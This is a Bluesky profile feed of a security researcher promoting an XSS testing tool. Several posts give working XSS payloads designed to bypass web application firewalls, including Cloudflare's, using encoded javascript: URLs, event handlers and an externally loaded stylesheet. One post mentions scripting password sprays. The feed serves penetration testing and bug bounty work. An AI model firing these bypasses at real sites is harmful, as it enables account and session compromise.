BRute Logic's Avatar

BRute Logic

@brutelogic.bsky.social

#CyberSecurity #Hacking #XSS #SQLi #WAF #Bypass knoxss.me

637 Followers  |  25 Following  |  10 Posts  |  Joined: 29.08.2024  |  1.7786

Latest posts by brutelogic.bsky.social on Bluesky

This might trick some #XSS filters out there, including CloudFlare's.

<Svg OnLoad="alert//>%0A(1)"

07.05.2025 15:47 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Preview
Subscription Plans Sign up now to get access to the best possible XSS testing tool! Includes BRute Logic's XSS ebook as a bonus for 1-Year subscriptions.

#BlackFriday

KNOXSS is up to 50% OFF

Check it out!

knoxss.me/?page_id=1974

#XSS #BugBounty #PenTesting

29.11.2024 16:35 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

If you learn a #hacking technique but can't make it work, it's because you understand the example, not the technique.

21.11.2024 23:22 β€” πŸ‘ 2    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Nice work in the original payload below.

Although "style=" (and "<link") being easily caught by most cloud WAFs I've seen out there, I've just made it shorter and "bypass friendly".

<p><dd onscrollsnapchange=alert(1)>
<link href=//X55.is/k rel=stylesheet>

PoC: brutelogic.com.br/xss.php?a=%3...

21.11.2024 19:45 β€” πŸ‘ 2    πŸ” 1    πŸ’¬ 0    πŸ“Œ 0
Post image

brutelogic.com.br/blog/buildin...

21.11.2024 11:37 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image

Some neat #XSS tricks to #Bypass #WAF in URL Context

=> HTMLi + Double Encoding + Embedded bytes

JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"

=> + Octal Encoding

JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"

Lab: brutelogic.com.br/dom/sinks.ht...

19.11.2024 15:35 β€” πŸ‘ 4    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

I’m so happy to see all my old twitter friends and no nefarious billionaires!!

18.11.2024 01:00 β€” πŸ‘ 45218    πŸ” 2222    πŸ’¬ 1029    πŸ“Œ 78

Thank you, appreciate it.

18.11.2024 09:44 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

<XSS OnBlueSky=import(X)>

17.11.2024 23:37 β€” πŸ‘ 4    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0
Preview
Main The State of The Art in XSS Testing. KNOXSS detects and proves with a popup 50+ XSS cases.

knoxss.me - Accuracy is everything.

10.11.2024 19:54 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

#PenTesting?
Script your Password Spray.

29.08.2024 22:06 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

@brutelogic is following 20 prominent accounts